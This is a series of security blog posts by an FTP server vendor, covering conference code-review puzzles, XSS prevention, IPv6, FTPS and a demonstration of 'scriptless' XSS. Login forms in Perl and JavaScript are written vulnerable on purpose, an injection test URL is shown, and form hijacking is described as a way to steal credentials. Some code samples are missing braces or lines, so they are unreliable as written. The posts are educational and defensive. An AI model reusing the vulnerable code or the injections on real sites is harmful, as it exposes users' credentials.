Texas Imperial Software DefCon 18 challenge

MVP Mug Shot 2I rarely write about my business on the blog here, and perhaps I should do so some more.

I mentioned in the post earlier today of how I’d “hacked” my badge (“hacked” in the sense of “that’s not programming, that’s typing”) to display the Texas Imperial Software and WFTPD logos, and the wftpd.com domain hosting our web site.

Also, that I’ll be wearing my bright orange Texas Imperial Software t-shirt.

So, here’s the competition:

Take a photo of the Texas Imperial Software logo either from my shirt or my badge, post it to your blog (or other web-site), along with a description of where you saw me, and a link to Texas Imperial Software’s web site, http://www.wftpd.com, send me an email with a link to your site, and when I get back to the office, I’ll email you a free copy of WFTPD Pro – and as long as your page stays there for six months, you’ll get free updates the same as the rest of our customers.

What can you do with the free copy of WFTPD Pro? You can host your own secured FTP server, using the FTP over TLS protocol defined in RFC 4217, and also known as FTPS. Of course, what I’m guessing you’re going to do is hack on it – and that’s OK, providing that you notify me by email before(*) publishing your results. If you turn that hacking into a paper for a con, give me the opportunity to support your presentation, whether that’s with rebuttal, fixes, or mere apologies (sorry, can’t afford money).

The closest thing I have to a catch for this is that it has to be your own unique photo – I’ll be comparing all submissions for similarity, and the best way to avoid duplicates is to have someone else take the photo for you, and put yourself in the picture. And don’t forget, I don’t read your blog, so you have to email me a link to it.

Thanks for participating,


(*) I’d prefer the Google-recommended sixty days to fix stuff, but if you’re the kind of hacker who believes all vendors need public spanking, then by all means post immediately after emailing me. After all, it’s not like you couldn’t do that with the trial version anyway. But if you do that, I’ll be all grumpy about it, and won’t buy you a drink next time I see you.

I’m at DefCon–what’s on your badge?

I’ve been at DefCon 18 for some of Friday – and as with Black Hat, it’s my first time.

I’ve decoded the bar code on the badge, but have no idea what it means (is it the name of Vera’s brother?), and I’ve got a fair idea what the Japanese text is encouraging us to do.

And, just to demonstrate that I can follow simple instructions, you’ll notice that my badge doesn’t look like your badge:


I should add that this isn’t anything particularly clever that I’ve done here, I haven’t solved any riddles or puzzled my way through anything, just managed to read some relatively simple (but somewhat code-ish) instructions. I hope to see many of you with similarly customised badges.

In recognition of the graphics I have on my badge, I’ll be wearing my Texas Imperial Software shirt on Saturday, too.

Here’s an even tighter close-up:


Black Hat Amazon code question part 2

Thanks for the comments so far on the first day’s code question at Black Hat.

I’ll leave it a little while before posting the comments and answers, because it’ll give you a chance to think it through for yourself if you haven’t already done so.

Meanwhile, here’s the code example for day 2. What’s wrong with it?

wchar_t *fillString(
    wchar_t content, unsigned int repeat)
    wchar_t *buffer;
    size_t size;
    if (repeat > 0x7fffffffe)
        return 0;
    size = ( repeat + 1 ) * sizeof content;
    buffer = (wchar_t *) malloc ( size );
    if ( buffer == 0 )
        return 0;
    wmemset(buffer, content, repeat);
    buffer[ repeat ] = 0;
    return buffer;

.csharpcode, .csharpcode pre
font-size: small;
color: black;
font-family: consolas, “Courier New”, courier, monospace;
background-color: #ffffff;
/*white-space: pre;*/
.csharpcode pre { margin: 0em; }
.csharpcode .rem { color: #008000; }
.csharpcode .kwrd { color: #0000ff; }
.csharpcode .str { color: #006080; }
.csharpcode .op { color: #0000c0; }
.csharpcode .preproc { color: #cc6633; }
.csharpcode .asp { background-color: #ffff00; }
.csharpcode .html { color: #800000; }
.csharpcode .attr { color: #ff0000; }
.csharpcode .alt
background-color: #f4f4f4;
width: 100%;
margin: 0em;
.csharpcode .lnum { color: #606060; }The language is C++, and as with the previous example, assume that everything that is not given above is perfect.

In case it is important, this was tested on an x86 system, although the flaw will also show up in x64. We were repeatedly asked that question.

Amazon Black Hat coding question

I’m at Black Hat, hanging out at the Amazon booth with my colleagues, and quite amazed at the stir created by the coding question I put up on the board.

Vegas 017

For those of you that haven’t had a chance to see the code, or need more time to figure out what’s wrong, I’m posting the code here. Sadly, no prizes for those of you who aren’t able to come to the booth, and I won’t be accepting posts commenting on the code until after the conference is over.Vegas 015

Consider it a theoretical exercise in code review – how would you handle this Java code arriving in front of you at a code review?

public static boolean isDifferent(
    final MyBean oldBean,
final MyBean newBean)
        oldBean != newBean &&
oldBean != null &&

Post your comments, and after the conference is over, I’ll open them up.

For those of you that think in C++ instead of Java (and there were many at the conference), here’s a version in that language:

    static bool isDifferent(
        const someClass const * oldObject, 
        const someClass const * newObject)
            oldObject != newObject &&
            oldObject != NULL &&

There are no ‘cheat’ issues – code not present in the sample is assumed to be perfect.

.csharpcode, .csharpcode pre
font-size: small;
color: black;
font-family: consolas, “Courier New”, courier, monospace;
background-color: #ffffff;
/*white-space: pre;*/
.csharpcode pre { margin: 0em; }
.csharpcode .rem { color: #008000; }
.csharpcode .kwrd { color: #0000ff; }
.csharpcode .str { color: #006080; }
.csharpcode .op { color: #0000c0; }
.csharpcode .preproc { color: #cc6633; }
.csharpcode .asp { background-color: #ffff00; }
.csharpcode .html { color: #800000; }
.csharpcode .attr { color: #ff0000; }
.csharpcode .alt
background-color: #f4f4f4;
width: 100%;
margin: 0em;
.csharpcode .lnum { color: #606060; }

Simplifying Cross Site Scripting / HTML Injection

Some simple statements about Cross Site Scripting / XSS / HTML Injection (all terms for the same thing):

  • Ignore the term “Cross Site Scripting” as a confusing anachronism. Think “HTML Injection” whenever you hear “Cross Site Scripting”, and you won’t go wrong.
  • The problem of XSS can be summed up quite simply as:
    • XSS allows an outsider to re-write your vulnerable web page(s) before your end users see them.
      • That means any part of the web page can be re-written to do anything your web page could do to the end user
      • That means any attack on your users will be trusted as much as your users trust you
      • That means your users’ credentials, session cookies and other secret information is controlled by an attacker
    • XSS is hard to detect, and in some cases impossible for you, the server owner, to detect an attack on your users.
    • XSS is easy to prevent, but requires your developers to be aware of, and work to prevent, the problem.
    • The presence of XSS vulnerabilities may void your compliance with regulatory standards such as PCI, SOX, etc.
      • Allowing outsiders to rewrite your web page may mean that you cannot state that you adequately control access to the collection of financially significant data.
      • PCI requires you develop applications with regard to a recognised standard framework, and specifically points to OWASP. OWASP lists XSS and Injection flaws as two of the “top ten” vulnerabilities to prevent. This is as close as PCI gets to outright stating that XSS prevents compliance from being achievable.
  • All XSS attacks have four components:
    • The Injection
      • Where the attacker provides bad data, either directly to the user, or through a ‘store and replay’ mechanism.
    • The Escape (from “text” / “data” to “code”)
      • The escape is optional – but that option is under the control of the page’s author
      • If the page author requires an escape, the attacker cannot attack without correctly escaping
    • The Attack
      • The attack is mandatory – an XSS attack requires an attack component. Duh.
      • However – where an escape is required by the web page, the attack must follow the escape.
      • There are numerous possible attacks – and more being developed daily. You cannot list all possible attack patterns.
    • The Cleanup
      • The cleanup is optional, at the choice of the attacker, and hides from the user the fact that they have been exploited
      • Many attacks are fast enough to use your users’ credentials that the cleanup is not required. By the time the user notices (often only a second or so), the attacker has stolen the account, made purchases or read off credit card information.
  • Given this component approach, you as a web page author have limited options:
    • You can’t block the cleanup, because it’s too late at that point – the attack has occurred, and besides, the attacker may not be interested in the cleanup. The cleanup is really only useful in demonstrating that subtle attacks can take place, giving attackers months to clean out a credit card.
    • Blocking the attack is a leaky measure – not that it isn’t worth doing in some cases. For instance, browser protections against XSS often block the attack measure because they don’t control the web site, and can’t reasonably block anything else.
    • Blocking the escape is a guaranteed measure. If attacker-supplied code cannot be viewed by the browser as code, there is no possibility of attack.
    • Blocking the injection is also a guaranteed measure, with two caveats – when you block an injection, you have to make sure that the injection hasn’t already occurred, and that it cannot occur from any other sources.
      • This means that if you block injection of code into, say, a database of message forum posts,you have to scan the existing posts to ensure that the injection hasn’t already taken place.
        • Clean your database when you recognise an injection or attack pattern.
      • Any time there is a database that accumulates information for later display, there will be more than one source vying to put data into the database. If injection is possible in one source, injection is likely from other sources, too.
        • Funnel all sources through one injection filter.
      • Preventing an escape from text into code works whether or not all the injections are blocked.
        • Never rely on injection prevention alone.
  • No matter how innovative attackers get, Cross Site Scripting attacks need not occur.
    • Learn how browsers differentiate between text and code.
    • Use that knowledge to ensure that text remains text, and is never seen as code.
    • Let the browser and your web server platform and libraries help you
      • Use an appropriate document object model function to set text values on fields.
      • Instead of composing HTML in a string to include user supplied text, use a <span> or a <div>, and set its innerText property.
    • Don’t sacrifice safety for speed.
      • Don’t build HTML “on the fly”, either while generating the page or displaying it.
        • InnerHTML is a bad thing to set.
    • Don’t try to “test out” XSS vulnerabilities.
      • You (or your testers) are not Ash Ketchum, and therefore cannot “catch ‘em all”.
    • Develop XSS vulnerabilities out of your application
      • Anything you didn’t specifically write as code, is attacker-supplied untrustworthy data.
      • Prevent injections as much as possible by validating that input is correctly formed.
        • Note that you can’t completely validate all input in all cases.
        • The obvious “bad example” is that of a bug reporting system into which security vulnerability reports are placed. If I have to report an issue with an XSS flaw, I’m going to be deliberately and respectfully pasting XSS attack code into your application. So in that case, you cannot possibly validate my information and remove “invalid” code without removing the valuable part of the text!
        • Validation at the Client is for Convenience only – it allows you to quickly say “that’s not right” and have the user correct it.
        • Only validation at the Server is for Security. Anything you ask the client browser to do on your behalf may be ignored.
      • If you have limited resources, focus on preventing the ability to escape from text into code.
        • Do this by encoding output so that each level of processing can accurately and uniformly distinguish between code and data.
          • This means you must know what each level of processing uses as encoding or escaping of character sequences.
          • This also means you must know how many layers of processing there are between you and the user.
  • If you do ONE THING to prevent XSS on your site, output encoding is the one thing to do.
    • Defence in depth says “never do just one thing”. One thing will one day fail to be implemented properly.

X-Day–less than a year away!


As you can see from the IPv4 Exhaustion Counter to the left (snapshot taken 7/16/2010, 7:30 pm PDT), IPv4 addresses are dwindling.

OK, so that’s perhaps a rather simplistic description of what’s going on – these are a count of the IANA blocks that have not yet been handed out to other providers. Usually what happens is that the IANA hands blocks out to regional network block managers, and they hand them out, piece by piece, to the local providers, who hand them out one (or more for larger organisations) at a time to consumers.

So, even when all these blocks have been handed out (known as “X-Day”), there will still be addresses to be handed out to consumers – but it is a key indicator to follow in realising that IPv4 is a dead-end strategy, and something else needs to be investigated.

What, again?

Yes, we’ve had these calls to move to a new addressing format for years – back in 1993, when I first got on the Internet, there was a lot of discussion about “IPng – Internet Protocol, the Next Generation” (STNG was current then, you must understand).

Later, as IPv6 came along, NATs (Network Address Translators) were brought out as the saviour to IPv4. The idea was that we’d all use the same internal addresses as one another (so each company has their own local 10.* netblock behind the NAT), and a single external IP address for each NAT. To put it mildly, this is not a solution to the problem, it merely postponed it a little – if anything the fact that we have to use NATs is indicative that we have already run out of IPv4 addresses. Until you look into it, you really have no idea how much work we have already put into changing our applications to work with NATs in an effort to prop up IPv4, when we could have spent that time in adopting IPv6.

So we are closer to having to go to IPv6?

Sure – but hey, what’s not to like about IPv6? Unless you’re the developer of a piece of network software, it all just plain works.

Applications accessing file shares by name – can still access file shares over IPv6, without a line of change. Only if you’re dealing specifically with the IP layer and IP addresses will you see a problem. It doesn’t take a lot to turn an app from IPv4-only to IPv6-capable, and users will hardly notice a difference, if you expose names, rather than IP addresses. [It took me two hours to convert the underlying engine of WFTPD and WFTPD Pro to use IPv6. The user interface took/is taking me longer, because I'm not so good at UI, and haven't had the focused time I need. But it’s coming.]

You have to reconfigure your routers a little – they at least need to either act as DHCPv6 sources, or handle DHCPv6 traffic to/through a redirector. Ask your router manufacturer what they recommend. And, since you won’t be using a NAT as an accidental firewall, you’ll want to make sure your routers have real firewall functionality.

Technology leaders should be asking to beta test our ISPs’ IPv6 support, and if your ISP isn’t at least beta testing IPv6 support, get them to catch up, or move to one that does. Good gracious, even laggard Comcast is testing IPv6 for its customers!

Some things to look forward to with IPv6:

  • Multicast supported natively – maybe Internet radio stations will pick up on this and make their live feeds take up less global bandwidth.
  • IPsec supported natively – no excuse any more.
  • Because IP addresses are longer and impossible to remember, names will become more prevalent. That’s a good thing, because it discourages you thinking of numeric IP addresses as secure, static or necessary to know.
  • Every machine now becomes a "first class citizen" on the Internet. This means FTP works, H.264 and other protocols that require transmission of IP address in the protocol. [That makes IPsec easier and more efficient, too]
  • No more NATs. [Except for the pesky IPv4 <-> IPv6 translation layers] No more kludges to deal with NATs.
  • There are currently a number of services that are either only available on IPv6, or are available for free on IPv6. That will only grow as time goes on.

FTP is Secure; Is Your FTP Server Secure?

Stupid spammer is stupid, spamming me his stupid spam.

As far as I can tell, I have had no interactions with either Biscom or Mark Eaton. And yet, he sends me email every couple of months or so, advertising his company’s product, BDS. I class that as spam, and usually I delete it.

Today, I choose instead to comment on it.

Here’s the text of his email:


Although widely used as a file transfer method, FTP may leave users non-compliant with some federal and state regulatory requirements. Susceptible to hacking and unauthorized access to private information, FTP is being replaced with more secure file transfer technologies. Companies seeking ways to prevent data breaches and keep confidential information private should consider these FTP risks:

» FTP passwords are sent in clear text
» Files transferred with FTP are not encrypted
» Unpatched FTP servers are vulnerable to malicious attacks

Biscom Delivery Server (BDS) is a secure file transfer solution that enables users to safely exchange and transfer large files while maintaining a complete transaction and audit trail. Because BDS balances an organization’s need for security – encrypting files both at rest and in transit – without requiring knowledge workers to change their accustomed business processes and workflows, workers can manage their own secure and large file delivery needs. See how BDS works.

I would request 15 minutes of your time to mutually explore on a conference call if BDS can meet your current and future file transfer requirements. To schedule a time with me, please view my calendar here or call my direct line at 978-367-3536. Thank you for the opportunity and I look forward to a brief call with you to discuss your requirements in more detail.

Best regards,

Better than most spammers, I suppose, in that he spelled my name correctly. That’s about the only correct statement in the entire email, however. It’s easy to read this and to assume that this salesman and his company are deliberately intending to deceive their customers, but I prefer to assume that he is merely misinformed, or chose his words poorly.

In that vein, here’s a couple of corrections I offer (I use “FTP” as shorthand for “the FTP protocol and its standard extensions”):

  • “FTP may leave users non-compliant”
    • I have yet to see a standard that states that FTP is banned outright. While FTP is specifically mentioned in the PCI DSS specification, it is always with language such as “An example of an insecure service, protocol, or port is FTP, which passes user credentials in clear-text.” FTP has not required user credentials to be passed in clear text for over a decade. An FTP server with a requirement that all credentials are protected (using encryption, one-time password, or any of the other methods of securing credentials in FTP) would be accepted by PCI auditors, and by PCI analysis tools.
  • “Susceptible to hacking and unauthorized access to private information”
    • BDS’s suggested replacement, Biscom, relies on the use of email to send a URL, and HTTPS to retrieve files.
    • email is eminently susceptible to hacking, as it is usually sent in the clear (to be fair, there are encryption technologies available for email, but they are seldom used in the kind of environments under discussion)
    • HTTPS is most definitely also susceptible to hacking and unauthorised access.
  • “FTP is being replaced with more secure file transfer technologies”
    • FTP may be replaced, that’s for certain, but I have not seen it replaced with more secure, reliable, or standard file transfer technologies.
      • Biscom essentially puts an operational framework around the downloading of files from a web server. It doesn’t add any security that FTP is lacking.
    • One more secure file transfer technology could be, of course, a more modern FTP server and client, which handles modern definitions of the FTP protocol and its extensions – for instance, the standard for FTP over TLS (and SSL), known as FTPS, which allows for encryption of credential information and file transfers, as well as the use of client and server certificates (as with HTTPS) to mutually authenticate client and server.
      • While the FTPS RFC was finalised only in 2005, it had not changed substantially for several years prior to that. WFTPD Pro included functional and interoperable implementations in versions dating back to 2001.
  • “FTP passwords are sent in clear text”
    • “People walk out into traffic without looking” – equally true, but equally open to misinterpretation. Most people don’t walk out into traffic without looking; most FTP servers are able to refuse clear text logons.
    • FTP passwords are sent in clear text in the most naïve implementations of FTP. This is true. But FTP servers have, for a decade and more, been able to use encryption and authentication technologies such as Kerberos, SSL and TLS, to prevent the transmission of passwords in clear text. If passwords are being sent in clear text by an FTP implementation, that is a configuration issue.
  • “Files transferred with FTP are not encrypted”
    • Again, for a decade and more, FTP servers have encrypted files using Kerberos, SSL or TLS.
    • If your FTP transmission does not encrypt files when it needs to, it is because of faulty configuration.
  • “Unpatched FTP servers are vulnerable to malicious attacks”
    • So are unpatched HTTP servers; so are unpatched email servers and clients; the very technology on which BDS depends.
    • Are unpatched BDS servers invulnerable? I thoroughly doubt that any company could make such a claim.
  • “BDS [operates] without requiring knowledge workers to change their accustomed business processes and workflows”
    • … unless your accustomed business process is to use your FTP server as a secure and appropriate place in which to exchange files.

Finally, some things that BDS can’t, or doesn’t appear to, do, but which are handled with ease by FTP servers. (All of these are based on the “How BDS works” page. As such, my understanding is limited, too, but then I am clear in that, and not claiming to be a renowned expert in their protocol. All I can do is go from their freely available material. FTP, by contrast, is a fully documented standard protocol.)

  • Accept uploads.
    • The description of “How BDS works” demonstrates only the manual preparation of a file and sending it to a recipient.
    • To allow two-way transfers, it appears that BDS would require each end host their own BDS server. FTP requires only one FTP server, for upload and/or download. Each party could maintain FTP servers, but it isn’t required.
  • Automated, or bulk transfers.
    • Again, the description of “How BDS works” shows emailing a recipient for each file. Are you going to want to do that for a dozen files? Sure, you could zip them up, but the option of downloading an entire directory, or selected files chosen by the recipient, seems to be one you shouldn’t ignore.
    • If your recipients need to transfer files that are continually being added to, do you want them to simply log on to an established account, and fetch those files (securely)? In the BDS model, that does not appear to be possible.
  • Transfer from regular folders.
    • BDS requires that you place the files to be fetched on a specialised server.
    • FTP servers access regular files from regular folders. If encryption is required, those folders and files can be encrypted using standard and well-known folder and file-level encryption, such as the Encrypting File System (EFS) supplied for free in Windows, or other solutions for other platforms.
  • Reduce transmission overhead
    • FTP transmissions are slightly smaller than their equivalent HTTP transmissions, and the same is true of FTPS compared to HTTPS.
    • When you add in the email roundtrip that’s involved, and the human overhead in preparing the file for transmission, that’s a lot of time and effort that could be spent in just transferring the file.
  • Integration with existing identity and authorisation management technology.
    • Where FTP relies on using operating system authentication and access control methods, you can use exactly the same methods to control access as you do for controlling access to regular files. It does not seem as though BDS is tied into the operating system in the same way.
    • [FTP also usually offers the ability to manage authentication and access control separately from the operating system, should you need to do so]
  • Shared files
    • If your files need to be shared between a hundred known recipients, BDS appears to require you to create one download for each file, for each recipient. That’s a lot of overhead.
    • FTP, by comparison, requires you to place the files into a single location that all these users can access. Then send an email to the users (you probably use a distribution list) telling them to go fetch the file.
    • Similarly, you can use your own FTP server to host a secure shared file folder for several of your customers. BDS does not offer that feature.

So, all things told, I think that Biscom’s spam was not only unsolicited and unwanted, but it’s also at the very least incorrect and uninformed. The whitepaper they host at http://www.biscomdeliveryserver.com/collateral/wp/BDS-wp-aberdeen-200809.pdf repeats many of these incorrect statements, attributing them to Carol Baroudi of “The Aberdeen Group”. What they don’t link to is a later paper from The Aberdeen Group’s Vice President, Derek Brink, which is tagged as relating to FTPS and FTP – hopefully this means that Derek Brink is a little better informed, possibly as an indirect result of having Ipswitch as one of the paper’s sponsors. I’d love to read the paper, but at $400, it’s a little steep for a mere blog post.

So, if you’ve been using FTP, and want to move to a more secure file transfer method, don’t bother with the suggestions of a poorly-informed spammer. Simply update your FTP infrastructure if necessary, to a more modern and secure version – then configure it to require SSL / TLS encryption (the FTP over Kerberos implementation documented in RFC 2228, while secure, can have reliability issues), and to require encrypted authentication.

You are then at a stage where you have good quality encrypted and protected file transfer services, often at little or no cost on top of your existing FTP infrastructure, and without having to learn and use a new protocol.

Doubtless there are some features of BDS that make it a winning solution for some companies, but I don’t feel comfortable remaining silent while knowing that it’s being advertised by comparing it ineptly and incorrectly to my chosen favourite secure file transport mechanism.

Cross-Site Scripting (XSS) – no script required

I’m going to give away a secret that I’ve successfully used at every interview I’ve had for a security position.

Cross-Site Scripting” (XSS) is a remarkably poor term for the attack or vulnerability (code can be particularly vulnerable to a cross-site scripting attack) it describes. The correct term should be “HTML Injection”, because it succinctly explains the source of the problem, and should provide developers with pretty much all the information they need to recognise, avoid, prevent, and address the vulnerabilities that lead to these attacks being possible.

  1. It doesn’t abbreviate well – the accepted abbreviation is XSS, because CSS was taken by “Cascading Style Sheets”
  2. Nobody seems to be able to explain, definitively and without the possibility of being contradicted by someone else’s explanation, whether “Cross Site” means “intra site”, “inter site”, both or neither. Certainly there are examples of attacks which use one XSS-vulnerable page only to exploit a user.
  3. As you will see from the remainder of this post, no actual script is required at all, either on the browser, or on the server. So, disabling script in the browser, or running a tool such as noscript that essentially does the same thing for you, is not a complete solution.
  4. HTML Injection can include injecting ActiveX, Flash, Java, or JavaScript objects into an HTML page.

[Note that I am not suggesting that prior work into XSS protections is bad, just that it is not complete if it focuses on JavaScript / ECMAScript / whatever you want to call it.]

Failure to understand XSS has led to people assuming that they can protect themselves by simple measures – disabling JavaScript, filtering “<script>” tags, “javascript:” URLs, and so on. Such approaches have uniformly failed to work, in much the same way as other “black-list” methods of defeating attacks on security flaws – it pretty much dares the attacker to find a way to exploit the bug using something else.

Particularly galling is when I look at code whose developers had heard about XSS, had looked about for solutions, and had found a half-baked solution that made them feel better about their code, made the bug report go from “reproducible” to “cannot reproduce”, but left them open to an attacker with a little more ingenuity (or simply a more exhaustive source of sample attacks) than they had. It seems that developers often try, but are limited by the resources they find on the Intarweb – particularly blogs seem to provide poor solutions (ironic, I know, that I am complaining about this in my blog).

I know all this – give me something new.

Alright then, here’s something that appears to be new to many – a demonstration of Cross-Site Scripting without scripting.

We all know how XSS happens, right? A programmer wants to let the user put some information on the page. Let’s say he wants to warn the user that his password was entered incorrectly, or his logon session has expired. So, he needs to ask the user to enter username and password again, but probably wants to save time by putting the user’s name in place for the user, to save on typing.

Here’s what the form looks like – you’ve all seen it before:


The code for this form is simple, mostly to make the example easy. I’ll write it in Perl and Javascript – because the Perl version is exploitable everywhere, and because the Javascript version demonstrates how DOM-based XSS attacks work (and how browser strangeness can cause them to be flakey).

[Note: A DOM-based attack, for those that don’t know, is an attack that uses Javascript to modify the HTML page while it is at the browser’s site. These are difficult to detect, but generally result from the use of unsafe functionality such as the innerHTML call.]

Needles to say – don’t use these as examples of good code – these are EXAMPLES of VULNERABLE CODE. And lousy code at that.


use CGI;
$query = new CGI;
print $query->h1("
Session timed out."), $query->p("You have been logged out from the site - please enter your username and password to log back in."), $query->start_form(-action=>"happyPage.htm", -method=>"get"), "Username: <input name=\"username\" value=\"" + $query->param("username") + "\" />",$query->br(),
"Password: ", $query->input(-name=>"password",-type=>"password"),$query->br(), $query->submit(),


<h1>Session timed out.</h1>
<p >You have been logged out from the site - please enter your username and password to log back in.</p>
<form id="safeForm" action="happyPage.htm" method="get">
  Username: <input name="username" value="name placeholder" /><br />
  Password: <input name="password" type="password" /><br />
  <input type="submit" />

<script type="text/javascript">
    var queries;
    function getQueryString(key) {
        if (queries == undefined) {
            queries = {};
            var s = window.location.href.replace(/[^?]+\?/, "").split("&");
            for (var x in s) {
                var v = s[x].split("=");
                if (v.length == 2)
                    queries[v[0]] = decodeURIComponent(v[1].replace(/\+/g, " "));
        if (key in queries)
            return queries[key];
        return "";

    var myField = document.getElementById("safeForm");

    if (myField != null) {
        var un = getQueryString("username");

        // Build the form with the username passed in.

        myField.innerHTML = myField.innerHTML.replace(/name placeholder/,un);

.csharpcode, .csharpcode pre
font-size: small;
color: black;
font-family: consolas, “Courier New”, courier, monospace;
background-color: #ffffff;
/*white-space: pre;*/
.csharpcode pre { margin: 0em; }
.csharpcode .rem { color: #008000; }
.csharpcode .kwrd { color: #0000ff; }
.csharpcode .str { color: #006080; }
.csharpcode .op { color: #0000c0; }
.csharpcode .preproc { color: #cc6633; }
.csharpcode .asp { background-color: #ffff00; }
.csharpcode .html { color: #800000; }
.csharpcode .attr { color: #ff0000; }
.csharpcode .alt
background-color: #f4f4f4;
width: 100%;
margin: 0em;
.csharpcode .lnum { color: #606060; }

Side Note – on DOM-based XSS and anchors

Now, why did I specifically include the “getQueryString” in my Javascript version above? I could have simply said “assume this function exists with ordinary behaviour”. Well, I chose that one (downloaded from, naturally, a blog advising how to do this properly) because it processes the entire href, anchor and all.

If we modify our URL by adding “#&” between the query and the variable “username”, it demonstrates one of the more frightening aspects of DOM-based attacks. Those of you who are aware of what an anchor does to a browser will already have figured it out, but here’s a quick explanation.

The “anchor” is considered to be everything after the “#” in a URL. Although it looks like it’s part of the query string, it’s not. Browsers don’t send the “#” or anything after it to the server when requesting a web page, so it’s not seen in a network trace, and it’s not seen in the server logs. This means that DOM-based attacks can hide all manner of nastiness in the anchor, and your scanners won’t pick it up at all.

Back to the scriptless XSS…

So, this page would normally get executed with a parameter, “username” which would be the username whose account we’re asking for credentials for – and certainly it works with http://localhost/XSSFile.htm?username=Fred@example.com :


The trouble is, it also works with the XSS attackers’ favourite test example, alert("XSS")%3b’>http://localhost/XSSFile?username="><script>alert("XSS")%3b</script> :


Now, I’ve seen developers who are given this demonstration that their page is subject to an XSS attack. What do they do? They block the attack. Note that this is not the same as removing or fixing the vulnerability. What these guys will do is block angle brackets, or the tag “<script>”. As a security guy, this makes me sigh with frustration, because we try to drill it into people’s heads, over and over and over again, that blacklisting just doesn’t work, and that “making the repro go away” is not equivalent to “fixing the problem demonstrated by the repro”.

The classic attacker’s response to this is to go to http://ha.ckers.org/xss.html for the XSS Cheat Sheet, and pull something interesting from there. Maybe use the list of events, say, to decide that you could set the ‘onfocus’ handler to execute your interesting code.

But no, let’s suppose by some miracle of engineering and voodoo the defender has managed to block all incoming scripts. Even so, we’re still vulnerable to XSS.

What happens if we try this link:


[The “%3d” there is a hex value representing the “=” character so that the query-string parser doesn’t split our attack.]


OK, that’s kind of ugly – but it demonstrates that you can use an XSS vulnerability to inject any HTML – including a new <form> tag, with a different destination – “badpage” in our URL above, but it could be anywhere. And by hiding the attacked input field, we can engineer the user into thinking it’s just a display issue

With some piggery-jokery, we can get to this:


Looks much better (and with more work, we could get it looking just right):


So, there you have a demonstration of scriptless cross-site scripting. XSS, or HTML Injection, as I’d prefer you think of it, can inject any tag(s) into your page – can essentially rewrite your page without your knowledge. If you want to explain the magnitude of XSS, it is simply this – an attacker has found a way to rewrite your web page, as if he was employed by you.

[Of course, if I hadn’t been trying to demonstrate that XSS is a misnomer, and prove that you can shove any old HTML into it, I would simply have used a piece of script, probably on the onmouseover event, to set the action of the form to post to my bad site. Fewer characters. Doing so is left as an exercise for the reader.]

Side discussion – why does the Javascript version work at all?

It doesn’t work in Internet Explorer, but in other browsers, it seems to work just fine. At first look, this would seem to suggest that “innerHTML” on a <form> tag is allowing the “</form">” in the XSS to escape out from the parent form. I can assure you that’s not the case, because if you could escape out, that would be a security flaw in the browsers’ implementation of innerHTML. So, what’s it doing, and how do you find out?